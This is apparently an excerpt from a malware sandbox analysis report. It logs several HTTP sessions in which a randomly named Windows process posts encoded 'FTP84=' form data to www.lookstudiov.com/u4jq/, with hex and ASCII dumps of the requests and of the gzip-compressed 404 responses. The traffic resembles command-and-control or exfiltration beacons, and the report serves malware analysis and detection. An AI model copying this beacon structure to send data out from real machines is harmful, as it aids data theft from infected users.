                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.76446874.208.236.162806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:17.499043941 CEST725OUTPOST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 218
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 50 42 68 30 2b 66 31 63 2f 79 72 62 66 4f 2f 34 38 56 4e 77 64 59 51 4e 65 63 41 6c 6e 32 6d 63 76 7a 35 63 6d 6c 2b 4c 73 6d 4c 68 32 52 54 42 36 44 6c 39 43 59 6d 50 31 69 6a 31 32 4c 39 78 6f 2b 57 4c 6c 31 38 58 70 38 35 4b 2b 37 59 65 71 6b 45 67 67 7a 76 34 57 56 74 71 33 72 51 34 35 6c 64 56 79 39 6c 4b 66 67 61 49 48 63 2f 54 6d 33 37 52 45 4f 4e 35 54 43 65 55 4c 5a 51 52 39 50 4c 4b 55 75 4f 71 6f 52 59 5a 34 52 4f 51 65 6c 67 76 77 6e 6a 66 42 63 38 63 65 33 67 36 64 4d 58 62 59 34 7a 63 46 41 49 6c 63 71 51 46 6e 4f 6f 65 62 43 54 52 41 69 78 62 69 67 6d 63 38 45 49 2f 49 69 6d 50 69 4a 74 47 77 67 6f 35 67 67 3d 3d
                                                  Data Ascii: FTP84=PBh0+f1c/yrbfO/48VNwdYQNecAln2mcvz5cml+LsmLh2RTB6Dl9CYmP1ij12L9xo+WLl18Xp85K+7YeqkEggzv4WVtq3rQ45ldVy9lKfgaIHc/Tm37REON5TCeULZQR9PLKUuOqoRYZ4ROQelgvwnjfBc8ce3g6dMXbY4zcFAIlcqQFnOoebCTRAixbigmc8EI/IimPiJtGwgo5gg==
                                                  Jul 1, 2024 19:25:18.313036919 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:17 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip
                                                  Data Raw: 33 30 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7d 77 db 36 b2 f7 df cd a7 60 94 d3 44 da 8a 92 28 c9 b2 2d 5b e9 ed 76 db e7 f6 39 dd 6d 4f d3 de bb 7b 37 7b 7c 28 09 b2 98 48 a2 96 a4 fc b2 5e 7f f7 fb 9b 01 40 02 7c d1 8b ed 74 93 bb 4d 6b 5b 02 81 99 c1 60 30 18 60 06 c3 67 e7 cf ff f0 c3 d7 3f ff e5 c7 6f 9c 79 b2 5c bc 7e 76 4e 7f 9c 85 bf ba 1c d5 c4 ca fd e5 4d cd 99 fa 89 ef c6 fe 95 70 27 e1 22 8c dc 78 32 17 4b 31 aa dd 8a 58 3d bc dd bc 0f dc 44 96 2e 82 cb 79 52 23 40 c2 9f be 7e e6 e0 df f9 52 24 be 33 99 fb 51 2c 92 51 ed 97 9f bf 75 4f 50 23 7b b4 f2 09 de 55 20 ae d7 61 94 d4 9c 49 b8 4a c4 0a 55 af 83 69 32 1f 4d c5 55 30 11 2e 7f 69 3a c1 2a 48 02 7f 01 32 fc 85 18 79 ad 8e 05 6a 9e 24 6b 57 fc 7d 13 5c 8d 6a 7f 76 7f f9 ca fd 3a 5c ae fd 24 18 2f 84 01 37 10 23 31 bd 14 ba e5 22 58 bd 77 22 b1 18 d5 d6 51 38 0b a8 ea 3c 12 b3 51 8d a0 0d db ed cb e5 fa b2 15 46 97 ed 9b d9 aa ed 79 68 f6 d9 79 12 24 0b f1 fa 47 ff 52 38 ab 30 71 66 e1 66 35 75 5e be 38 e9 7a de 99 f3 7d 18 [TRUNCATED]
                                                  Data Ascii: 303f}}w6`D(-[v9mO{7{|(H^@|tMk[`0`g?oy\~vNMp'"x2K1X=D.yR#@~R$3Q,QuOP#{U aIJUi2MU0.i:*H2yj$kW}\jv:\$/7#1"Xw"Q8<QFyhy$GR80qff5u^8z}w$i:uuI>pg_E8LWiW_-7X_q=\x@h' 1]kz&ajGqrGDfo3[!.@o^&=*Oc2AK<uuX7"Ie/6ooqFmmOHmsmi7Z&noW_]>24F'njsers}vd?(V.dVejh:jyI&KN=mVz\5qSrgR$g.i,$f,_vfY,$anaZqam=i4u DkF?IR4;M|WW>TDu.H4P^/~PT4s%X%WQE4>[h
                                                  Jul 1, 2024 19:25:18.313054085 CEST224INData Raw: a6 69 c5 34 35 9f 8a 9a c6 59 24 92 4d b4 72 92 96 80 10 dc d6 35 03 89 7d 8d 3b f5 50 8c 46 a3 e8 af c9 df ee 1b 19 83 37 9a c1 f1 75 40 ec 47 ed 09 24 aa 36 5b f8 97 b5 a1 6a b8 42 a5 da db cd f4 a4 37 c1 ef d9 ac f7 76 33 13 9d d9 db 4d b7 d3
                                                  Data Ascii: i45Y$Mr5};PF7u@G$6[jB7v3M?%jcZv:Y@TelGqhJ?wGga|6LV7J"WD]3=XSk>"e>N"vY
                                                  Jul 1, 2024 19:25:18.313065052 CEST1236INData Raw: ba f0 7c 44 cb 4a 38 73 fe 3b 8c de 8b e8 ff 2d c2 b1 bf 78 33 09 d7 e2 e5 cb 58 2c 66 58 7e 31 df 57 93 d2 2a 5f 92 3c ff 30 9b 41 51 0b b1 fa 9a 27 68 bd d7 e9 34 bd a3 4e 63 18 b4 50 0c 05 f1 cd 02 e6 c3 2a a9 d7 e4 0c ae 35 9a fe 28 a2 69 f8
                                                  Data Ascii: |DJ8s;-x3X,fX~1W*_<0AQ'h4NcP*5(i5-6s_wpT[TS,Xp]kjNu7WOgB}C*6J~S@O#8h2Dk;EOkXM)&}esA{#um\
                                                  Jul 1, 2024 19:25:18.313076973 CEST224INData Raw: 52 f0 23 12 06 6e 51 f7 7a 47 53 71 d9 8c 2e c7 7e 7d d0 f4 fa c7 cd 6e f7 b8 e9 35 9c ce e7 54 58 f7 8e 8e 9a 27 1e 0a fb 0d c7 eb 74 3e 6f e4 fa a4 01 b9 98 44 36 87 33 dc 26 1b ab f1 d7 bd 6e 17 78 60 fa 9f 74 52 f4 9d 66 b7 73 d2 f4 7a 28 d9
                                                  Data Ascii: R#nQzGSq.~}n5TX't>oD63&nx`tRfsz(#B.h8~;e5*<)7xJloR7O%Z2%P4O:7]'a ~t5h:[?l#A59@u.
                                                  Jul 1, 2024 19:25:18.313119888 CEST1236INData Raw: 81 2e a3 c6 18 a8 d3 93 86 73 92 96 01 41 ff a4 79 bc 93 7d d0 95 50 95 52 94 f5 9c db 42 3c 49 45 b7 33 40 0f 00 59 21 f3 48 7c 8e 40 7d 7f a7 d0 4a 6c bc 28 fb 9b 9b ad 6c ea 1e a1 0b e8 96 37 c0 18 18 dd ea 1f 35 fb 28 39 d2 c8 21 27 9d e6 a0
                                                  Data Ascii: .sAy}PRB<IE3@Y!H|@}Jl(l75(9!'ki1;kzj,SiNl>=XWA:x^exOHC@E-1*u;f}Bi8L^{=lStEp;&+}(tT1ztX?Vl&Jdo,pZ&,
                                                  Jul 1, 2024 19:25:18.313133001 CEST1236INData Raw: 40 81 23 66 52 c7 4e 78 40 8e 9a 2f 1c da 11 39 5c 86 7d 7d af 97 96 9d 15 ba 4a ae 24 f4 72 ee c7 e8 12 3c 12 92 f4 3b 45 61 36 23 ca bc 17 0d 4b a3 31 8c fc 61 e5 9e e0 f2 cd 4a 20 b3 73 63 4f 70 5c b7 04 46 ea fc d8 13 4e 5a bf 04 96 3c 97 c7
                                                  Data Ascii: @#fRNx@/9\}}J$r<;Ea6#K1aJ scOp\FNZ<i%<YI9qe=@l<kVnTUZQ\J`{OZ%PyUDR@Jz"c.y9H%)cBY'D6zCyz
                                                  Jul 1, 2024 19:25:18.313150883 CEST1236INData Raw: b8 60 bc c4 c4 4f a0 b5 ff a7 de a7 9b 5b 8d b3 b5 88 f8 a2 0d cd 55 22 05 21 0b ea a0 98 ee 78 6d e2 21 2e 4a a8 2e 50 2c b2 ee 02 7f 96 f1 40 43 8e 5b 94 1a a1 94 34 c9 ab 32 b2 86 c3 b1 00 51 a2 59 20 78 38 f4 67 88 a7 84 d3 92 17 c9 e1 ab 57
                                                  Data Ascii: `O[U"!xm!.J.P,@C[42QY x8gW)8,?&eLZ`=w=sGE TJNJ%J!7.) Fdmx/ngFc.[-t.8O]voFjV>\BCR<{Sd2(
                                                  Jul 1, 2024 19:25:18.313163042 CEST1236INData Raw: 25 e9 0a 95 d1 b4 80 50 b3 3a 35 33 99 d3 26 8d 7c 87 84 b2 30 e4 ba 2c f7 7d 6e 88 d4 9d 22 19 f2 61 92 8d 96 d6 1a eb f1 3d 1d 5e e1 ee 0b a3 90 9f f3 4a f1 60 ab 8c 6e f6 db da 89 1c 40 da 80 20 24 2e bc 48 48 28 3c 51 da 9c 8b 96 21 76 54 ab
                                                  Data Ascii: %P:53&|0,}n"a=^J`n@ $.HH(<Q!vT;E/L*X%(Q[hp}2gsCN'%G^pzGUfn\S[!=Ji*i%{TO@QD"`EG-IM*4mHP@@bZJm\.
                                                  Jul 1, 2024 19:25:18.313179016 CEST1236INData Raw: a2 22 f7 7e 1b 6b ca 67 a8 3d 78 1f f7 12 93 0e a4 3c 9e 7e a4 01 a8 d6 4a 29 3d 50 a9 6b 24 29 ae ec 7f fe 70 94 dd a3 56 d3 19 de fc 55 7d 61 c6 36 48 ac 86 78 75 d7 44 cc 43 3a 7a df d3 9e b1 9a 2b fb ae 92 72 d3 ff 54 a4 5a b5 ae 20 be dc 20
                                                  Data Ascii: "~kg=x<~J)=Pk$)pVU}a6HxuDC:z+rTZ !kiM+L}WOsAiJND>[N-W6lfq0r~k_QVd;I $jO7V_K7&paPlSN-'[RLCU181y^1
                                                  Jul 1, 2024 19:25:18.313215017 CEST1236INData Raw: 57 fe a2 d0 22 a4 48 95 e4 56 95 eb ea 31 de f4 26 54 99 a7 40 84 08 bb 0a 34 64 f9 4c 5a 54 f2 b3 a6 20 c0 39 e6 6a a2 1b cb 67 ec e1 91 1f ef 6b e0 a7 4f af 5b 8f 31 4b e2 f7 c1 da e5 09 0a 65 26 c4 0a bd e4 ac 80 e4 5f d0 72 f9 42 0d 39 1a 7e
                                                  Data Ascii: W"HV1&T@4dLZT 9jgkO[1Ke&_rB9~$tREm31{CoNR.ApYhU_KUJ4a:TYsxTE1Gpj/Rh(fQ|RHWkStd]5<qt$a,!H;,+T,o@%Bz%j
                                                  Jul 1, 2024 19:25:18.320240974 CEST1236INData Raw: db ad af e8 93 f3 4b fc 09 f5 6f b0 c7 d2 15 89 19 0e c8 2e 22 91 6c 22 e4 aa c7 28 2e 71 64 73 eb fc 88 7c e1 93 db 4f a7 b3 bd 93 3d 46 33 9e 87 b0 93 de e0 f7 c7 d4 31 35 1f e9 40 46 d9 ca 6c 3b 5b 9f c9 a2 34 b7 8e 59 fc 8d b4 d4 b2 ef b9 44
                                                  Data Ascii: Ko."l"(.qds|O=F315@Fl;[4YD$jmTS!*?5e2<+435R)bNi<*j_GdI*_.A5+I{ .*_=;tC(ED( W&ABqjh&7uM


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.76446974.208.236.162806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:20.040369034 CEST745OUTPOST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 238
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 50 42 68 30 2b 66 31 63 2f 79 72 62 65 76 76 34 36 43 5a 77 61 34 52 2f 62 63 41 6c 74 57 6d 59 76 7a 39 63 6d 6d 79 39 74 55 76 68 32 30 33 42 35 43 6c 39 42 59 6d 50 39 43 6a 77 34 72 39 76 6f 2b 71 44 6c 30 73 58 70 38 39 4b 2b 37 6f 65 71 54 59 6a 68 6a 76 6d 44 46 74 30 36 4c 51 34 35 6c 64 56 79 39 67 64 66 6b 2b 49 47 73 50 54 6e 53 50 53 59 2b 4e 36 55 43 65 55 50 5a 51 56 39 50 4c 34 55 72 57 41 6f 54 67 5a 34 55 79 51 65 77 56 35 70 58 6a 6a 4e 4d 39 64 54 46 4a 59 62 4d 2f 45 42 35 33 65 62 69 59 52 55 38 4e 6e 39 73 6b 79 46 54 72 71 45 67 56 74 31 47 37 70 2b 46 4d 6e 46 41 53 75 39 2b 49 73 39 79 4a 39 32 59 68 7a 6e 41 39 54 39 41 41 71 30 62 43 57 7a 62 78 73 51 51 34 3d
                                                  Data Ascii: FTP84=PBh0+f1c/yrbevv46CZwa4R/bcAltWmYvz9cmmy9tUvh203B5Cl9BYmP9Cjw4r9vo+qDl0sXp89K+7oeqTYjhjvmDFt06LQ45ldVy9gdfk+IGsPTnSPSY+N6UCeUPZQV9PL4UrWAoTgZ4UyQewV5pXjjNM9dTFJYbM/EB53ebiYRU8Nn9skyFTrqEgVt1G7p+FMnFASu9+Is9yJ92YhznA9T9AAq0bCWzbxsQQ4=
                                                  Jul 1, 2024 19:25:20.869039059 CEST1236INHTTP/1.1 404 Not Found
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Date: Mon, 01 Jul 2024 17:25:20 GMT
                                                  Server: Apache
                                                  X-Powered-By: PHP/8.2.20
                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                  Link: <http://lookstudiov.com/wp-json/>; rel="https://api.w.org/"
                                                  Content-Encoding: gzip
                                                  Data Raw: 33 30 33 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 7d 77 db 36 b2 f7 df cd a7 60 94 d3 44 da 8a 92 28 c9 b2 2d 5b e9 ed 76 db e7 f6 39 dd 6d 4f d3 de bb 7b 37 7b 7c 28 09 b2 98 48 a2 96 a4 fc b2 5e 7f f7 fb 9b 01 40 02 7c d1 8b ed 74 93 bb 4d 6b 5b 02 81 99 c1 60 30 18 60 06 c3 67 e7 cf ff f0 c3 d7 3f ff e5 c7 6f 9c 79 b2 5c bc 7e 76 4e 7f 9c 85 bf ba 1c d5 c4 ca fd e5 4d cd 99 fa 89 ef c6 fe 95 70 27 e1 22 8c dc 78 32 17 4b 31 aa dd 8a 58 3d bc dd bc 0f dc 44 96 2e 82 cb 79 52 23 40 c2 9f be 7e e6 e0 df f9 52 24 be 33 99 fb 51 2c 92 51 ed 97 9f bf 75 4f 50 23 7b b4 f2 09 de 55 20 ae d7 61 94 d4 9c 49 b8 4a c4 0a 55 af 83 69 32 1f 4d c5 55 30 11 2e 7f 69 3a c1 2a 48 02 7f 01 32 fc 85 18 79 ad 8e 05 6a 9e 24 6b 57 fc 7d 13 5c 8d 6a 7f 76 7f f9 ca fd 3a 5c ae fd 24 18 2f 84 01 37 10 23 31 bd 14 ba e5 22 58 bd 77 22 b1 18 d5 d6 51 38 0b a8 ea 3c 12 b3 51 8d a0 0d db ed cb e5 fa b2 15 46 97 ed 9b d9 aa ed 79 68 f6 d9 79 12 24 0b f1 fa 47 ff 52 38 ab 30 71 66 e1 66 35 75 5e be 38 e9 7a de 99 f3 7d 18 [TRUNCATED]
                                                  Data Ascii: 303d}}w6`D(-[v9mO{7{|(H^@|tMk[`0`g?oy\~vNMp'"x2K1X=D.yR#@~R$3Q,QuOP#{U aIJUi2MU0.i:*H2yj$kW}\jv:\$/7#1"Xw"Q8<QFyhy$GR80qff5u^8z}w$i:uuI>pg_E8LWiW_-7X_q=\x@h' 1]kz&ajGqrGDfo3[!.@o^&=*Oc2AK<uuX7"Ie/6ooqFmmOHmsmi7Z&noW_]>24F'njsers}vd?(V.dVejh:jyI&KN=mVz\5qSrgR$g.i,$f,_vfY,$anaZqam=i4u DkF?IR4;M|WW>TDu.H4P^/~PT4s%X%WQE4>[h
                                                  Jul 1, 2024 19:25:20.869061947 CEST224INData Raw: a6 69 c5 34 35 9f 8a 9a c6 59 24 92 4d b4 72 92 96 80 10 dc d6 35 03 89 7d 8d 3b f5 50 8c 46 a3 e8 af c9 df ee 1b 19 83 37 9a c1 f1 75 40 ec 47 ed 09 24 aa 36 5b f8 97 b5 a1 6a b8 42 a5 da db cd f4 a4 37 c1 ef d9 ac f7 76 33 13 9d d9 db 4d b7 d3
                                                  Data Ascii: i45Y$Mr5};PF7u@G$6[jB7v3M?%jcZv:Y@TelGqhJ?wGga|6LV7J"WD]3=XSk>"e>N"vY
                                                  Jul 1, 2024 19:25:20.869074106 CEST1236INData Raw: ba f0 7c 44 cb 4a 38 73 fe 3b 8c de 8b e8 ff 2d c2 b1 bf 78 33 09 d7 e2 e5 cb 58 2c 66 58 7e 31 df 57 93 d2 2a 5f 92 3c ff 30 9b 41 51 0b b1 fa 9a 27 68 bd d7 e9 34 bd a3 4e 63 18 b4 50 0c 05 f1 cd 02 e6 c3 2a a9 d7 e4 0c ae 35 9a fe 28 a2 69 f8
                                                  Data Ascii: |DJ8s;-x3X,fX~1W*_<0AQ'h4NcP*5(i5-6s_wpT[TS,Xp]kjNu7WOgB}C*6J~S@O#8h2Dk;EOkXM)&}esA{#um\
                                                  Jul 1, 2024 19:25:20.869086981 CEST1236INData Raw: 52 f0 23 12 06 6e 51 f7 7a 47 53 71 d9 8c 2e c7 7e 7d d0 f4 fa c7 cd 6e f7 b8 e9 35 9c ce e7 54 58 f7 8e 8e 9a 27 1e 0a fb 0d c7 eb 74 3e 6f e4 fa a4 01 b9 98 44 36 87 33 dc 26 1b ab f1 d7 bd 6e 17 78 60 fa 9f 74 52 f4 9d 66 b7 73 d2 f4 7a 28 d9
                                                  Data Ascii: R#nQzGSq.~}n5TX't>oD63&nx`tRfsz(#B.h8~;e5*<)7xJloR7O%Z2%P4O:7]'a ~t5h:[?l#A59@u..sAy
                                                  Jul 1, 2024 19:25:20.869098902 CEST1236INData Raw: 9f d7 68 60 10 6f 64 a0 d9 d0 81 3b a2 6e 69 c4 b2 25 b3 a1 05 e6 83 0d 3b 2d bb 7b 91 95 ae cf 7a ed b7 a6 83 b8 b9 4b bd 09 34 89 cb a6 0c ea d0 23 f7 3a 22 ad 4f bf cf 78 35 77 b1 c2 2f b1 c5 56 4b 67 41 5a a9 11 c4 54 ab 18 5a e9 0a 75 48 1f
                                                  Data Ascii: h`od;ni%;-{zK4#:"Ox5w/VKgAZTZuHd:epggQ,]Y$F,C%%xv+y0a="Hn#4b)A\\!q{3b9J<9jg>A$$Wqta@#fRNx@/9\}
                                                  Jul 1, 2024 19:25:20.869111061 CEST672INData Raw: d1 c5 a3 c9 60 42 d7 7c f8 e9 d4 8f de e3 26 d5 16 26 58 35 34 f9 36 0f b8 8a cd 02 bf e7 9f fa 29 0b cc 0a 1a c4 ac 37 eb cf 06 16 1d 26 03 6c 06 31 80 ac ff 36 83 b3 87 dc fd ee 8c fe 2b 02 e6 de 03 e9 a0 97 3e 54 4a 01 3b ec 94 f3 d2 2f c3 bc
                                                  Data Ascii: `B|&&X546)7&l16+>TJ;/1{]KG,iX]a}pW[5{HwjbfRVG7YY{Fp(1=tG[pTtJA*EfM*`O[
                                                  Jul 1, 2024 19:25:20.869122982 CEST1236INData Raw: 27 8b 40 85 14 74 49 c9 9b db e5 38 44 2e 18 05 d2 6c 28 83 ab ae 39 6d d4 b0 0f cd 9f 1e a8 0c 3d 44 e5 5b bb 0f 6c 48 ce 32 c5 ae 8d 1d d1 1b 77 c6 1d f3 01 74 14 6e 3d ab 58 2a b9 18 47 88 eb 46 06 3d 5a 7f 31 00 1c 77 25 6f ca 73 24 a7 e2 b5
                                                  Data Ascii: '@tI8D.l(9m=D[lH2wtn=X*GF=Z1w%os$or(=bC~ios.8k#ksyyueX ':Hbl)LM]5\!XwiW*<[|x9IDrqV-P}Q+r*)v}jm=5'`c8
                                                  Jul 1, 2024 19:25:20.869134903 CEST1236INData Raw: 37 77 70 80 c3 4e 69 3e b6 76 3b 9c e2 c6 3c c0 e4 68 12 d8 3d 1c 2c c1 17 9a dd 29 65 b5 c4 46 7e c7 a6 a6 d8 42 9b 87 d9 7a f7 48 95 51 46 96 8d a4 5c 81 a8 76 db 6d fd bc ae e7 fe 6c 33 f3 73 56 8c 89 64 4f c3 47 35 99 46 e1 1a 39 68 57 b0 db
                                                  Data Ascii: 7wpNi>v;<h=,)eF~BzHQF\vml3sVdOG5F9hW//1J6OhyN`LX=?s3=?4/{jFh2v<P{I_\<D-'d1og'tkFbL`G||#~m2LThMhQN
                                                  Jul 1, 2024 19:25:20.869148016 CEST1236INData Raw: 5a 51 fd 89 09 b5 a2 fa e3 94 eb ff a0 4c 4e be 53 37 de bd e1 c1 af 4e 2f 2d b8 db 7e 73 d4 b8 f2 24 cf 74 d5 5b c9 a4 e9 e2 ea 0b a6 3b 2f 9c 72 e3 f4 2e 94 6a bd 35 ae 57 ee 7e 06 47 57 d7 c5 3d 14 d6 86 92 c8 35 49 20 85 b8 2b f8 95 ee df b2
                                                  Data Ascii: ZQLNS7N/-~s$t[;/r.j5W~GW=5I +a=z[shu|N'0=\eWi,r"[[N}kKh?8C%<7,X*=DADL,|d){T7`G))8*"%_R]~'&Zu 2-6
                                                  Jul 1, 2024 19:25:20.869163036 CEST672INData Raw: 14 00 dd 19 99 51 45 f3 c6 9c 4c 2a d9 8a 86 75 1e e8 4a 33 5c bc 9e f9 08 53 bf 5c e1 45 df b8 88 81 77 9b 43 41 d1 a4 0f ac 29 9f a2 6c 4b 9c 0a 54 56 cc 63 ae c4 43 aa 87 73 e4 22 8e 96 36 f7 b3 fa a4 53 0a 8c 95 aa 66 ef c9 2c 05 19 d4 16 00
                                                  Data Ascii: QEL*uJ3\S\EwCA)lKTVcCs"6Sf,T%UVS9IRmmd*<Oc%g*e]vBH)%y*"WH:m4Yl:i:uP:+gAXP*iKTu>IXw!wFdrM
                                                  Jul 1, 2024 19:25:20.873969078 CEST1236INData Raw: 39 50 08 18 fb df a3 d0 f9 6a e5 7c 95 15 7e 14 dc 78 96 69 c0 57 ba 8b af b0 34 ed 50 5b d8 e8 3e 88 11 ed 04 26 e9 7b f7 36 dc d4 5e ff 05 c7 29 0e 0b c9 1b 1c 77 91 06 f8 03 dc 32 ce 77 b1 43 cc 12 d3 8f 82 3f 4a df b5 37 0b 68 bd 7d 74 5f ff
                                                  Data Ascii: 9Pj|~xiW4P[>&{6^)w2wC?J7h}t_d7c<\{1tru;Ko."l"(.qds|O=F315@Fl;[4YD$jmTS!*?5e2<+435R)bNi<*


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.76447074.208.236.162806696C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exe
                                                  TimestampBytes transferredDirectionData
                                                  Jul 1, 2024 19:25:22.578505993 CEST1758OUTPOST /u4jq/ HTTP/1.1
                                                  Host: www.lookstudiov.com
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Connection: close
                                                  Content-Length: 1250
                                                  Cache-Control: max-age=0
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.lookstudiov.com
                                                  Referer: http://www.lookstudiov.com/u4jq/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Data Raw: 46 54 50 38 34 3d 50 42 68 30 2b 66 31 63 2f 79 72 62 65 76 76 34 36 43 5a 77 61 34 52 2f 62 63 41 6c 74 57 6d 59 76 7a 39 63 6d 6d 79 39 74 55 6e 68 32 43 37 42 37 68 39 39 41 59 6d 50 33 69 6a 78 34 72 38 71 6f 2b 79 48 6c 30 67 68 70 2f 4a 4b 2f 61 49 65 39 53 59 6a 76 6a 76 6d 42 46 74 31 33 72 51 68 35 6c 4e 5a 79 38 51 64 66 6b 2b 49 47 71 6a 54 6b 48 37 53 61 2b 4e 35 54 43 65 41 4c 5a 51 39 39 4a 6a 53 55 76 4b 36 6f 69 41 5a 34 30 43 51 66 47 35 35 68 58 6a 68 4d 38 38 4f 54 46 56 75 62 4d 6a 2b 42 35 54 34 62 69 77 52 48 4e 4e 78 6f 64 38 35 45 53 48 30 4c 68 59 4c 69 58 33 71 78 6c 41 48 4d 51 79 73 37 4e 46 59 34 67 31 43 33 63 6f 68 37 78 46 39 6d 6a 49 48 6b 4f 44 4d 70 75 70 33 43 33 42 43 38 69 68 68 69 54 39 45 6d 6e 46 78 48 56 51 48 32 5a 47 70 4f 64 58 4a 61 6d 36 73 45 46 74 72 6c 76 59 32 62 50 48 38 6d 62 52 7a 68 64 79 6a 34 32 79 32 2f 75 4b 69 39 6e 35 4f 65 72 56 4e 66 6b 39 31 65 2b 63 64 4a 44 62 71 54 5a 30 37 76 42 4f 44 4c 63 2b 78 59 6f 6b 59 67 6b 62 76 59 73 63 39 [TRUNCATED]
                                                  Data Ascii: FTP84=PBh0+f1c/yrbevv46CZwa4R/bcAltWmYvz9cmmy9tUnh2C7B7h99AYmP3ijx4r8qo+yHl0ghp/JK/aIe9SYjvjvmBFt13rQh5lNZy8Qdfk+IGqjTkH7Sa+N5TCeALZQ99JjSUvK6oiAZ40CQfG55hXjhM88OTFVubMj+B5T4biwRHNNxod85ESH0LhYLiX3qxlAHMQys7NFY4g1C3coh7xF9mjIHkODMpup3C3BC8ihhiT9EmnFxHVQH2ZGpOdXJam6sEFtrlvY2bPH8mbRzhdyj42y2/uKi9n5OerVNfk91e+cdJDbqTZ07vBODLc+xYokYgkbvYsc9eyn5jxVup8HP712KMj2zAR1OXi8Ixwh7OUYMVgddjiyTjzY5ftfBNwxsG/IG5+iSvtJZeYB7iyHIx+7hqrgFk0A9Rw6RqG5Amf7t08NBV9qDdg3IFmCtQ8dvvq4atxk0bUPmmHREAOZKrakcaMb9vwXffMKwcw34lLxrBk7S0ppfzs3E8xeGcVmjCLc86SEi69bgkeQ/DPk7uzbmJVW7qi+GbXjl7dYXoeWxZPEKhdznOUMff355FU+MvNSM6dSpqQe07Es6JqyBfZlxSc3zuC64/oYjKva/adpiGhxwfiBhlZGdCiSsjJOAwU9JTW3LkcfCgi1+n6HvJeJcntAYZ/CrDrD8AC/bt+hWQpIfc77buC2P3jG1k25HNvc1TZjsrsaqU6IK6cBNlucyJrQN7ccAXBzIj+oMm9NuUAHOVpyQo/vcyHWH6OoRQBGqz0lXAe1PQSy4n6QyZBrrStFE72wWNwfIpvryhUhdpUiyfP9o9rwXeSrbmvtqm7Qn8U+FjDo5pCJ4pWdNoS2cR6pwyFRO19rEDOUfiihznM8g01LbAtTypYFZjogbVM/A4CkReSlCtgHl8a0Bo11D90Nzs5UZ1zC6LpqrZJVQIYLcumyeivSoWp/j5cXiqwww8l+U7La+cBkF2u+n6CHtiSk4+mLj+BNwLKVNqC [TRUNCATED]
                                                  Jul 1, 2024 19:25:23.369860888 CEST1236INHTTP/1.1 404 Not Found
